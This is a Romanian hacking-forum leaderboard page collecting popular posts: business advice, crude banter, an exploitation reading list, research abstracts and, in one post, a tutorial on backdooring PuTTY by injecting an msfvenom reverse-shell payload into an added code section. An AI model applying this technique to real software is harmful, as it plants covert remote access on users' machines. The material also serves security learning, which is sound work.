Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 06/21/18 in all areas

  1. 10 points
    Ok, cam rar vad lumea pe aici sa accepte critica si sa o vada ca pe ceva constructiv, deci bravo, inceput bun. Nu am vrut sa imi pierd vremea initial dar acum poate ca se va prinde ceva. Sfaturi (de luat cu putina sare, nu sunt expert in domeniu dar trecut prin anumite procese similare): 1. Scoate hyperlink-ul la site-ul tau din acest thread, nu te pune intr-o lumina pozitiva. Cineva care vrea sa vada cu cine are de a face inainte sa dea un ban si te cauta pe Google, va vedea ca tu esti in situatia celor pe care vrei sa-i ajuti dar tu nu esti in stare sa te ajuti pe tine insuti. Blind leading the blind if you catch my drift. Adica sa zicem ca tu esti o firma mica si vrei sa iti "maximizezi veniturile prin soluții tehnice" dupa cum spui mai sus, incluzand "marketing online" si "plan de dezvoltare" dupa cum spui pe site, tu tocmai de astea duci lipsa in momentul actual si te gandeai sa spamezi lumea in lipsa de alte idei. Daca o alta firma mica te plateste sa ii promovezi ce faci? Te apuci si spamezi pe altii pentru ei? Anyway, lasand la o parte ironia situatiei in care esti, sa revin la ceva cat de cat mai constructiv: 2. Trebuie sa scoti in evidenta din primele secunde cand cineva intra in contact cu tine/site-ul tau (nu se poate vorbi momentan de "brand") si anume cu ce esti diferit (in sens bun) fata de restul 'nspe mii de pulifrici/e care se dau experti, de ce se merita in primul rand sa petreaca timp sa te asculte (time is money) si apoi de ce sa iti dea bani. Cu alte cuvinte care este USP-ul tau? (Unique Selling Point). Apoi clientul sa inteleaga rapid cum poti folosi acel USP sa ii ajuti pe ei. Site-ul e foarte generic si "rece", nu reiese exact si concret ce oferi si cum si cum ii ajuti specific pe potentialii clienti. 3. Cunoaste-ti competitia, fa-ti temele de casa. Uita-te sa vezi cu cine ai rivaliza pe nisa ta. Uita-te sa vezi ce fac ei bine (dpdv al site-ului si cum se promoveaza) si incearca sa adaptezi (nu copiezi) la contextul tau. Uita-te sa vezi ce le lipseste (considera-te ca ai fi un potential client) si ce nu iti place, ce te-ar convinge sa le devii client, etc. si actioneaza ca atare in afacerea ta. Fa si un mic test cu prietenii, neamurile, familia, etc. si intreaba-i sa se considere mici antreprenori, etc. da-le un context al clientului tau ideal si apoi sa iti dea o privire onesta daca ar apela la serviciile tale ori la altii, ce i-ar convinge sa vina la tine, etc. 4. Cunoaste-ti mediul de operare si anume Romania - cultura in care operezi si anume in astfel de circumstante se merge inca foarte mult pe recomandari, din vorba buna a primilor clienti. In alte tari lumea se uita pe site-uri de rating-uri sau cum era pe vremuri yelp/yellow pages, etc. La inceput e nevoie sa iti creezi o baza puternica de sustinere si financiara dar si din punct de vedere al testimonialului. Pe langa relatia care trebuie sa o dezvolti, pe site trebuie sa explici concrect din acest punct de vedere ce ai facut tu sa inteleaga si ultimul bou. Ca ai pus niste "David, Constanța", "Mariana, Pitesti", "Carmen, Ilfov" e fix pielea pulii, are 0 credibilitate, poti scrie fraze de genul si adauga nume si locatii nelimitate. Daca te uiti pe site-urile profesioniste au "studii de caz". Acestea trebuie pastrate succint si in metoda STAR (Situation, Task, Action, Result). Adica ce probleme avea clientul de a apelat la tine (in acest fel potentialii clienti se identifica / raporteaza mai usor si se vad in pielea celor care au apelat la tine). Apoi ce ti-au dat tie sa faci (in subconstient asta le arata ca pot avea incredere in tine cu x, y, z.). Cum ai actionat (aici ai oportunitate de promovare sa arati cat de creativ esti, etc.) si apoi rezultatul (aici e punctul final de "vanzare" unde il convinge pe Badea din deal ca si ei pot avea acelasi rezultat sau mai bun daca apeleaza la serviciile tale). Am avut firme in trecut care mi-au oferit discount-uri considerabile in schimbul a unor astfel de cazuri de studiu sau testimoniale de genul. Acestea pot fi in ceva grafic si succint intr-un pdf sau un clip foarte scurt, sau combinat, etc. in functie de necesitate. 5. Pune-te la punct cu toate metodele eficiente (dpdv al timpului, costului, etc. inclusiv care sunt slabiciunile acestora) de a oferi ce vrei tu sa oferi. Nu vreau sa reiau punctul 1 de mai sus dar trebuie sa stii meserie daca vrei sa supravietuiesti. Este un process continuu, nu vei stii deajuns niciodata, dar orice client trebuie sa vada ca iti cunosti domeniul. Habarnistii supravietuiesc doar de pe prosti care nu stiu mai bine. Nu ma intelege gresit, se pot face bani multi si de pe prosti (ex: https://www.fiverr.com/gabonne) dar banuiesc ca nu vrei sa te axezi pe "nisa" asta. Tu spui ca oferi Suport IT, Marketing online, Identificare brand, Creare de aplicatii, Plan de dezvoltare. - din punctul meu de vedere la asta ajungi in timp cand ai un minim 50 angajati. Daca cineva vine de exemplu la tine si vrea sa le oferi toata gama pentru o firma mica de termopane ce faci, le pierzi timpul si banii sau ii refuzi ca habar nu ai? De exemplu daca pe langa un intranet in firma vrea solutii de back-ups zilnic, o aplicatie bespoke de CRM, plati, furnizori, etc. + plan de dezvoltare online, etc. Trebuie sa ai capabilitatea sa oferi ceea ce spui ca oferi. Si in ziua de azi lumea ca sa te pastreze ca si furnizor asteapta si sfaturi (mini-consultanta) in domeniu care vin cu produsul sa vada ca iti pasa de ei. De exemplu le spui uite putem face cum spui tu (full-back up zilnic de ex) dar poti face si incremental (e mai rapid, cost-efficient, etc.). In astfel de domenii devii si un fel de consultant si daca nu ai habar de ce vorbesti doar le pierzi vremea si banii si apoi iti iei talpa. Axeaza-te pe ceva ce stii foarte bine si apoi poti sa cresti organic. Poti sa legi colaborari cu altii care se pricep in alte domenii - cu cat colaborezi mai bine cu atat iesi mai ok. Cam atat deocamdata referitor la site si la tine... cand/daca mai am chef o sa scriu ceva si de idei de promovare..
  2. 4 points
    fura altul fara parola..e mai simplu Edit// ma scuzi, "cumpara" altul
  3. 4 points
    Dau vina pe @aelius, mentorul meu
  4. 4 points
    Mai bine fac dropshipping cu vibratoare. La cati betivi cu pula mica sunt in Romania, sigur fac vanzare buna la saracele femei :)))))))
  5. 4 points
    :))))))))))))))) DESCRIEREA PUNCTULUI DE LUCRU Afacerea este functionala. Are o baza de date de clienti. Afacerea se poate mari daca va fi promovata online prin google sau facebook. Pretul este negociabil. Nu se vinde firma, doar site-ul. Are SEO integrat. DETALII DESPRE TRANZACTIA DORITA Se vinde numai site-ul, pagina facebook, baza de date. Nu se vinde firma. Pretul nu este negociabil. Se ofera asistenta 30 zile. Clientii nu sunt cu "subscription" sa plateasca servicii ceva la tine. Ei cumpara acum si poate mai cumpara peste 2 ani ceva. Deci practic se vinde o saracie de magento, castiva natarai pusi in baza de date si cam atat. Deci in 5 ani au obtinut un profit de 9000 si vor 15.000 pe site. Hai ca e buna.
  6. 4 points
  7. 4 points
    Ceva de genul? (poate am ratat un quote ceva, e tarziu) #!/bin/bash # curl="/usr/bin/curl" sleep="/bin/sleep" website="https://www.domain.nl" token="8d1f1aac0dd8a76b49e8bbdda0c7c98c" wait="30" lines="50" services="apache nginx ftp ssh dmesg" update_argv="-H 'Content-Type: application/x-www-form-urlencoded' -X POST" update_site="https://www.domain.de" for (( ; ; )) do for i in $services do export $i=$($curl -s $website/servers.php?api=$token&func=get_details&detail=$i|tail -n $lines) done $curl -d "apache=$apache&nginx=$nginx&ftp=$ftp&ssh=$ssh&dmesg=$dmesg" -H "$update_argv" "$update_site/?api=$token&func=provision" $sleep $wait done
  8. 3 points
    Sa va indes pula in filelist si in mamici. Ati umplut forumul cu toate cacaturile.
  9. 3 points
    https://itty.bitty.site Itty bitty sites are contained entirely within their own link. (Including this one!) This means they're... 💼Portable - you don't need a server to host them 👁Private - nothing is sent to–or stored on–this server 🎁Easy to share as a link or QR code Itty bitty sites can hold about as much as a printed page, and there is a lot you can do with that: ✒️Compose poetry 🛠Create an app 🐦Bypass a 140 280 char limit 🎨Express yourself in ascii
  10. 3 points
    Iti este necaz ca e mai dotata ca tine :))))))))
  11. 3 points
    Tu crezi ca reusesti sa vinzi aici petarda ta de site. Eu banuiesc ca e al tau, primul post si direct aici ai aterizat :)))))
  12. 3 points
    Windows stack overflows Stack Base Overflow Articles. Win32 Buffer Overflows (Location, Exploitation and Prevention) – by Dark spyrit [1999] Writing Stack Based Overflows on Windows – by Nish Bhalla’s [2005] Windows heap overflows Heap Base Overflow Articles. Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002] Exploiting the MSRPC Heap Overflow Part 1 – by Dave Aitel (MS03-026) [September 2003] Exploiting the MSRPC Heap Overflow Part 2 – by Dave Aitel (MS03-026) [September 2003] Windows heap overflow penetration in black hat – by David Litchfield [2004] Kernel based Windows overflows Kernel Base Exploit Development Articles. How to attack kernel based vulns on windows was done – by a Polish group called “sec-labs” [2003] Sec-lab old whitepaper Sec-lab old exploit Windows Local Kernel Exploitation (based on sec-lab research) – by S.K Chong [2004] How to exploit Windows kernel memory pool – by SoBeIt [2005] Exploiting remote kernel overflows in windows – by Eeye Security Kernel-mode Payloads on Windows in uninformed – by Matt Miller Exploiting 802.11 Wireless Driver Vulnerabilities on Windows BH US 2007 Attacking the Windows Kernel Remote and Local Exploitation of Network Drivers Exploiting Comon Flaws In Drivers I2OMGMT Driver Impersonation Attack Real World Kernel Pool Exploitation Exploit for windows 2k3 and 2k8 Alyzing local privilege escalations in win32k Intro to Windows Kernel Security Development There’s a party at ring0 and you’re invited Windows kernel vulnerability exploitation Windows memory protections Windows memory protections Introduction Articles. Data Execution Prevention /GS (Buffer Security Check) /SAFESEH ASLR SEHOP Bypassing filter and protections Windows memory protections Bypass Methods Articles. Third Generation Exploitation smashing heap on 2k – by Halvar Flake [2002] Creating Arbitrary Shellcode In Unicode Expanded Strings – by Chris Anley Advanced windows exploitation – by Dave Aitel [2003] Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server – by David Litchfield Reliable heap exploits and after that Windows Heap Exploitation (Win2KSP0 through WinXPSP2) – by Matt Conover in cansecwest 2004 Safely Searching Process Virtual Address Space – by Matt Miller [2004] IE exploit and used a technology called Heap Spray Bypassing hardware-enforced DEP – by Skape (Matt Miller) and Skywing (Ken Johnson) [October 2005] Exploiting Freelist[0] On XP Service Pack 2 – by Brett Moore [2005] Kernel-mode Payloads on Windows in uninformed Exploiting 802.11 Wireless Driver Vulnerabilities on Windows Exploiting Comon Flaws In Drivers Heap Feng Shui in JavaScript by Alexander sotirov [2007] Understanding and bypassing Windows Heap Protection – by Nicolas Waisman [2007] Heaps About Heaps – by Brett moore [2008] Bypassing browser memory protections in Windows Vista – by Mark Dowd and Alex Sotirov [2008] Attacking the Vista Heap – by ben hawkes [2008] Return oriented programming Exploitation without Code Injection – by Hovav Shacham (and others ) [2008] Token Kidnapping and a super reliable exploit for windows 2k3 and 2k8 – by Cesar Cerrudo [2008] Defeating DEP Immunity Way – by Pablo Sole [2008] Practical Windows XP2003 Heap Exploitation – by John McDonald and Chris Valasek [2009] Bypassing SEHOP – by Stefan Le Berre Damien Cauquil [2009] Interpreter Exploitation : Pointer Inference and JIT Spraying – by Dionysus Blazakis[2010] Write-up of Pwn2Own 2010 – by Peter Vreugdenhil All in one 0day presented in rootedCON – by Ruben Santamarta [2010] DEP/ASLR bypass using 3rd party – by Shahin Ramezany [2013] Typical windows exploits Real-world HW-DEP bypass Exploit – by Devcode Bypassing DEP by returning into HeapCreate – by Toto First public ASLR bypass exploit by using partial overwrite – by Skape Heap spray and bypassing DEP – by Skylined First public exploit that used ROP for bypassing DEP in adobe lib TIFF vulnerability Exploit codes of bypassing browsers memory protections PoC’s on Tokken TokenKidnapping . PoC for 2k3 -part 1 – by Cesar Cerrudo PoC’s on Tokken TokenKidnapping . PoC for 2k8 -part 2 – by Cesar Cerrudo An exploit works from win 3.1 to win 7 – by Tavis Ormandy KiTra0d Old ms08-067 metasploit module multi-target and DEP bypass PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass SMBv2 Exploit – by Stephen Fewer Exploit development tutorial series Exploid Development Tutorial Series Base on Windows Operation System Articles. Corelan Team Exploit writing tutorial part 1 : Stack Based Overflows Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode Exploit writing tutorial part 3 : SEH Based Exploits Exploit writing tutorial part 3b : SEH Based Exploits – just another example Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit development Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR Exploit writing tutorial part 7 : Unicode – from 0x00410041 to calc Exploit writing tutorial part 8 : Win32 Egg Hunting Exploit writing tutorial part 9 : Introduction to Win32 shellcoding Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s Cube Exploit writing tutorial part 11 : Heap Spraying Demystified Fuzzysecurity Part 1: Introduction to Exploit Development Part 2: Saved Return Pointer Overflows Part 3: Structured Exception Handler (SEH) Part 4: Egg Hunters Part 5: Unicode 0x00410041 Part 6: Writing W32 shellcode Part 7: Return Oriented Programming Part 8: Spraying the Heap [Chapter 1: Vanilla EIP] Part 9: Spraying the Heap [Chapter 2: Use-After-Free] Securitysift Windows Exploit Development – Part 1: The Basics Windows Exploit Development – Part 2: Intro to Stack Based Overflows Windows Exploit Development – Part 3: Changing Offsets and Rebased Modules Windows Exploit Development – Part 4: Locating Shellcode With Jumps Windows Exploit Development – Part 5: Locating Shellcode With Egghunting Windows Exploit Development – Part 6: SEH Exploits Windows Exploit Development – Part 7: Unicode Buffer Overflows Tools Disassemblers, debuggers, and other static and dynamic analysis tools. angr – Platform-agnostic binary analysis framework developed at UCSB’s Seclab. BARF – Multiplatform, open source Binary Analysis and Reverse engineering Framework. binnavi – Binary analysis IDE for reverse engineering based on graph visualization. Bokken – GUI for Pyew and Radare. Capstone – Disassembly framework for binary analysis and reversing, with support for many architectures and bindings in several languages. codebro – Web based code browser using clang to provide basic code analysis. dnSpy – .NET assembly editor, decompiler and debugger. Evan’s Debugger (EDB) – A modular debugger with a Qt GUI. GDB – The GNU debugger. GEF – GDB Enhanced Features, for exploiters and reverse engineers. hackers-grep – A utility to search for strings in PE executables including imports, exports, and debug symbols. IDA Pro – Windows disassembler and debugger, with a free evaluation version. Immunity Debugger – Debugger for malware analysis and more, with a Python API. ltrace – Dynamic analysis for Linux executables. objdump – Part of GNU binutils, for static analysis of Linux binaries. OllyDbg – An assembly-level debugger for Windows executables. PANDA – Platform for Architecture-Neutral Dynamic Analysis PEDA – Python Exploit Development Assistance for GDB, an enhanced display with added commands. pestudio – Perform static analysis of Windows executables. Process Monitor – Advanced monitoring tool for Windows programs. Pyew – Python tool for malware analysis. Radare2 – Reverse engineering framework, with debugger support. SMRT – Sublime Malware Research Tool, a plugin for Sublime 3 to aid with malware analyis. strace – Dynamic analysis for Linux executables. Udis86 – Disassembler library and tool for x86 and x86_64. Vivisect – Python tool for malware analysis. X64dbg – An open-source x64/x32 debugger for windows Source : https://n0where.net/awesome-windows-exploitation-resources
  13. 3 points
    Fuzzing is an effective and widely used technique for finding security bugs and vulnerabilities in software. It inputs irregular test data into a target program to try to trigger a vulnerable condition in the program execution. Since the first random fuzzing system was constructed, fuzzing efficiency has been greatly improved by combination with several useful techniques, including dynamic symbolic execution, coverage guide, grammar representation, scheduling algorithms, dynamic taint analysis, static analysis and machine learning. In this paper, we will systematically review these techniques and their corresponding representative fuzzing systems. By introducing the principles, advantages and disadvantages of these techniques, we hope to provide researchers with a systematic and deeper understanding of fuzzing techniques and provide some references for this field. Download:
  14. 3 points
    Banesimtitestimancaneaicoaiele
  15. 3 points
    Most work on DOM Cross-Site Scripting (DOM-XSS) detection methods can be divided into three kinds: black-box fuzzing, static analysis, and dynamic analysis. However, black-box fuzzing and static analysis suffer much from high false negative rates and high false positive rates respectively. Current dynamic analysis is complex and expensive, though it can obtain more efficient results. In this paper, we propose adynamic detection framework (TT-XSS) for DOM-XSS by means of taint tracking at client side. We rewrite all JavaScript features and DOM APIs to taint the rendering process of browsers. To this end, new data types and methods are presented to extend the semantic description ability of the original data structure, based on which we can analyze the taint traces through tainting all sources, sinks and transfer processes during pages parsing. In this way, attack vectors are derived to verify the vulnerabilities automatically. Compared to AWVS 10.0, our framework detects more 1.8% vulnerabilities, and it can generate the corresponding attack vectors to verify 9.1% vulnerabilities automatically. Download paper:
  16. 2 points
    La ce barbati sunteti voi in ziua de azi, aia te bate si te fute in acelasi timp.
  17. 2 points
    Cel mai bine vezi bilantul contabil si contabilitatea, ca nu ai cum sa stii ce/cat s-a investit si de unde a scos "profitul" ala .... Pentru 5 ani si cifra de afaceri 90.000 euro (adica pana in 2000 euro/luna), e cam greu sa ai profit apetisant si angajati ca sa nu zic de cheltuieli adiacente. 9000euro profit pe 5 ani = 150euro/luna
  18. 2 points
    Toata lumea ar trebui sa stie despre Phrack. Cei tineri, ar putea arunca o privire peste POC || GTFO: https://www.alchemistowl.org/pocorgtfo/
  19. 2 points
    Salut, Este ilegal. Sunt in jur de 6 legi care definesc clar conditiile in care poti contacta pe cineva pentru oferte comerciale. In principiu, sa nu iti mai pierzi timpul citind acele legi: - Orice email nesolicitat care are caracter comercial este SPAM. - Pentru a trimite un email cu caracter comercial catre o adresa de email, trebuie sa ai in prealabil consimtamantul scris al destinatarului (sa fie scris clar: accept comunicatii comerciale din partea xyz) - Trebuie sa ai un sistem opt-in, opt-out foarte bine pus la punct. Vezi ca amenzile sunt usturatoare. Cel mai bine, daca te pricepi la vorbit, pune mana pe telefon si suna direct la firme. Alte sfaturi: - Adauga pe site informatii clare despre firma (adresa, telefon, cod fiscal si ce aveti voi acolo (alte date de identificare)) - Completeaza "despre noi" cu o poveste interesanta. Nu-mi starneste deloc interesul ce scrie acolo. Ma asteptam sa vad o echipa, cum ati inceput, ce viziune aveti .... - Sectiunea "ce spun alti" e fumata. Adica ... doar nu esti prost sa scrii pe site ca a spus un client: "Frate, sunteti praf, apucati-va de zidarie, bidonarilor". - Foloseste pagina pe https si redirecteaza versiunea de pe http catre cea https. Nu mai da link-uri cu http.
  20. 2 points
    Mai comentati aiurea si luati ban. Faceti o oferta sau inchideti tabul.
  21. 2 points
    Cu ce e asta diferit fata de restul nspe mii de care sunt open source? Scris de un indian fomist cu 4 followers pe Twitter si domeniu pe .tk Aparut ca ciuperca dupa ploaie, dispare la fel dupa ceva vreme.
  22. 2 points
    Pai daca nu avem voie sa ne folosim de buguri din random ce plm putem sa facem? Daca consideri ca random.choice e random atunci nu exista niciun challenge de programare. Castigurile si strategiile se pot calcula folosind ecuatiile de la probabilitati in clasa a 9. Dar ai sa observi ca se poate demonstra ca nu exista nicio strategie care sa ajunga pe castig. Lasa neuronalele genetice ca nu e asa usor, tac-pac: "neuroni cuantici" si faci bani la rulete.
  23. 2 points
    Welcome to my next blog post. Today i want to show you some basic pentesting stuff. We will manually backdooring a PE-File, in this case the putty client. I used the following software setup: Windows 10 Pro 32 Bit Putty Stud_PE Immunity Debugger Before we are getting our hands into assembly, i want to explain what we will do. We will add a section header named .evil to our file and hijack the file‘s execution flow. At the entry point we will redirect the execution to our shellcode and after gaining our shell, the ordinary appliaction is running (putty starts). #0x01 Adding Section At first we are going to add our new section .evil to our file through Stud_PE. The following pictures are pritty self explaining I choosed a section size of 1500 Bytes which are filled with nullbytes. That‘s more than enough for our shellcode. After saving the file and load it into Immunity you can see the differences between the two files (new section .evil is spawned). And if you look at the adress of .evil you will see the following (our predifined nullbytes) -> Great! While checking our new section you may noticed, that the adresses has slighty changed. The last 4 Bytes are always nullbytes but the first 4 Bytes are changing through every reloading process of the file. 00FB0000 <-> 00250000 That‘s a kernel protection ASLR, you can find more information about this countermeasurement here. This makes some more work, but isn‘t a problem (more later). #0x02 Hijack Execution Flow Now we are looking at the entry point of our file in Immunity. The First instruction at 0x002B7FD6 is a call instruction. We are going to change the first instructions to jump into our code cave (.evil). Before changing any assembly instruction copy the ‚old‘ instructions to a text file, because we are going to resume to the application flow after executing our shellcode. Mark the first instruction and type „jmp [adress of .evil]“ in my case „jmp 0x002E3000“. After hitting enter you will see the following: Save the changes to a new file and open it in immunity. Now we are taking the first instruction with F7 and are landing in our code cave of nullbytes at the .evil adress. For our testing purpose we replace the nullbytes with nops. To do so just mark all the nullbytes of the code cave and do the following: We save the state of our registers on the top of the stack through the assembly instruction pushad && pushfd. At the end of our code cave we restore our register states with popfd and popad. So far no problems (hopefully). Now we do some math do encounter the ASLR protection. We want to restore all overwritten functions at the end of our code cave and jump right back into the „old“ execution flow. If you are looking at the entry ponit of our file, you will see that only the call instruction is missing. Without enabled ASLR we could use the saved adress from our textfile just like „call x002B8265“, but you see that the adress of the second instruction „jmp 0x002B7E6E“ has also changed… ASLR Hurray! What now? We have to determine the offset between the old adresses to calculate the new overwritten call instruction. Instead trying to explain the several locations, adresses and relations i try to show it in following pictures (if this isn‘t enough, plz tell me via twitter and i will add text sections) In the end we got the „new“ adress for our overwritten call instruction which is 0x13F8265. We place this call instruction right behind the restored registers (pushfd, pushad). Now we only need to jmp to the next ordinary instrution at the entry point via „jmp 0x01067FD8“ and the execution will flow. #0x03 Inject Shellcode Choose your favourit shellcode or generate a new one . I used following command: msfvenom -p windows/shell_reverse_tcp lhost=10.0.2.6 lport=1337 exitfunc=thread -f hex Then use the binary paste function of Immunity to replace some of our nops with the shellcode. Save the file and voila, you sucessfully backdoored a PE-File ! Ok, just one thing is missing. The shellcode of msfvenom used the WaitForSingleObject function and the default values prevent the application to execute until the shell is released. To solve this change the „DEC ESI“ code at the end of the shellcode with a nop. 0x04 PoC Start your listener and fire up the application. Thanks for reading and if you like this post, check my twitter account please! xD Source: hansesecure.de
  24. 2 points
    While fuzzing is known to be a powerful mechanism for fingerprinting and enumerating bugs within hardware and software systems, the application of this technique to wireless systems remains nontrivial due to fragmented and siloed tools. Join us as we cover wireless fuzzing fundamentals and introduce a new tool to unify the approach across protocols, radios, and drivers. About the Speakers Matt Knight Matt Knight (@embeddedsec) is a center and left wing for the San Francisco Desert Owls ice hockey team. When his schedule allows he moonlights as a software engineer and security researcher, where he explores the boundaries between software, hardware, and wireless systems. With specific interests in RF networks and physical layers, he notably reverse engineered the LoRa PHY based on blind signal analysis. Matt holds a BE in Electrical Engineering from Dartmouth College. Ryan Speers Ryan Speers is a security researcher and developer who enjoys embedded systems, low-power radio protocols, and reversing proprietary systems. He has worked in offensive and defensive roles on networks, Windows, micro controllers, and many things in-between. As co-founder at River Loop Security, he tests embedded systems for security issues, and helps clients build more secure systems. He is also Director of Research for Ionic Security where he leads system and cryptographic research. He has previously spoken at a number of security conferences, including Troopers 14, and written some articles for journals ranging from peer-reviewed academic publications to PoC link: https://www.troopers.de/troopers18/agenda/rgdyd3/
  25. 2 points
    Daca imi dai o sabie cu sclipici pe metin te invat hecareala
×